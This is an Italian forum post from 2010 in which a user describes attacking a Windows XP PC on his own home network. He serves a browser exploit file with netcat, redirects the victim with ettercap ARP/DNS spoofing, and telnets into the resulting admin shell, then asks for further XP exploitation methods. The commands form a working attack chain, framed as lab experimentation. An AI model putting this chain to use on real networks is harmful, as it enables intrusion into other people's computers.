Tecniche di exploit per Sistemi Microsoft

« Older   Newer »
 
  Share  
.
  1. Jiose
    Posted on 15/11/2010, 23:37
        Like  
     
    .

    User deleted
    Salve a tutti,
    Ultimamente ho un po' di tempo libero e mi sto divertendo a provare tecniche per exploitare windows XP.

    La configurazione e' la seguente:

    1 pc connesso con Windows XP originale ed aggiornato con firewall configurato "senza eccezioni" ed un antivirus "avira" anche esso aggiornato quotidianamente, connesso direttamente sull' hag di fastweb

    1 laptop connesso tramite wireless con ubuntu 10.10

    Gli exploit che ho provato, con un sistema aggiornato e senza servizi aggiuntivi, sono perlopiu' inefficaci.

    Tranne per quelli che sfruttano le debolezze del browser "Mozilla o Internet Explorer" che si sono rivelati estremamente efficaci ed invisibili sia al firewall che all' antivirus.

    La tecnica utilizzata e' la seguente:

    Mi connetto alla rete wireless.

    Metto in ascolto l'exploit sulla porta 80 del laptop.
    Ovvero uso il comando nc
    CODE
    nc -l 80 < ./ExploitperIE.txt


    Avveleno i DNS rinviando la connessione del pc sull' IP del laptop.
    Ovvero uso ettercap per fare un DNS Poisoning
    CODE
    ettercap -TqP dns_spoof -i "scheda wireless" -M ARP /"IP PC"/


    Aspetto il trigger dell' exlpoit.

    Sano i DNS. :D
    chiudo ettercap con
    CODE
    q


    Mi connetto al computer exploitato con privilegi amministrativi.
    CODE
    telnet "IP" "Porta Exploit"


    Oltre a questa tecnica, secondo voi, quale altro modo e' altrettanto efficace per exploitare un XP?


    P.S.
    Non ho provato affatto e non ho intenzione di usare metasploit per due motivi.
    1) non e' didatticamente molto interessante
    2) e' un mattone :D
     
    .
0 replies since 15/11/2010, 23:37   285 views
  Share  
.

Windows XP
Create your forum and your blog! · Top Forum · Categories · Help · Status · Contacts · Powered by ForumFree